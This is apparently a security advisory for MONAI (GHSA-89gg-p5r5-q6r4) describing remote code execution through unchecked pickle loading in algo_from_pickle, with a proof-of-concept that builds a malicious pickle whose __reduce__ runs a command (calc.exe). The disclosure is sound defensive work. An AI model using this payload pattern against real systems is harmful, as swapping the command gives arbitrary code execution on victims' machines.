Vulnerability GHSA-89gg-p5r5-q6r4

High Risk
HIGH RISK
CVSS Score: 7.6
Score Range: 7.0–8.9
High severity vulnerabilities (CVSS 7.0–8.9). Serious vulnerabilities that should be prioritized soon after critical fixes.
5 months ago
April 07, 2026 at 08:17 PM UTC
MONAI: Unsafe functions lead to pickle deserialization rce
0.0.1 - 1.5.2
0.0.1 - 1.5.2

Summary

MONAI: Unsafe functions lead to pickle deserialization rce

Details

Summary

The algo_from_pickle function in monai/auto3dseg/utils.py causes pickle.loads(data_bytes) to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.

Details

poc

import pickle
import subprocess
class MaliciousAlgo:
    def __reduce__(self):
        return (subprocess.call, (['calc.exe'],))
malicious_algo_bytes = pickle.dumps(MaliciousAlgo())

attack_data = {
    "algo_bytes": malicious_algo_bytes,  
     
}
attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
    f.write(pickle.dumps(attack_data))

Generate the malicious file "attack_algo.pkl" through POC.

from monai.auto3dseg.utils import algo_from_pickle


attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)

Ultimately, it will trigger pickle.load through a file to identify the command execution.

image

Causes of the vulnerability:

def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:

    with open(pkl_filename, "rb") as f_pi:
            data_bytes = f_pi.read()
        data = pickle.loads(data_bytes)

Impact

Arbitrary code execution

Repair suggestions Verify the data source and content before deserializing, or use a safe deserialization method

Impacted packages

Timeline

Published
5 months ago
April 07, 2026 at 08:17 PM UTC
Fixed (1.6.0)
3 months ago
June 22, 2026 at 04:47 PM UTC
Last Modified
1 day ago
September 27, 2026 at 11:56 AM UTC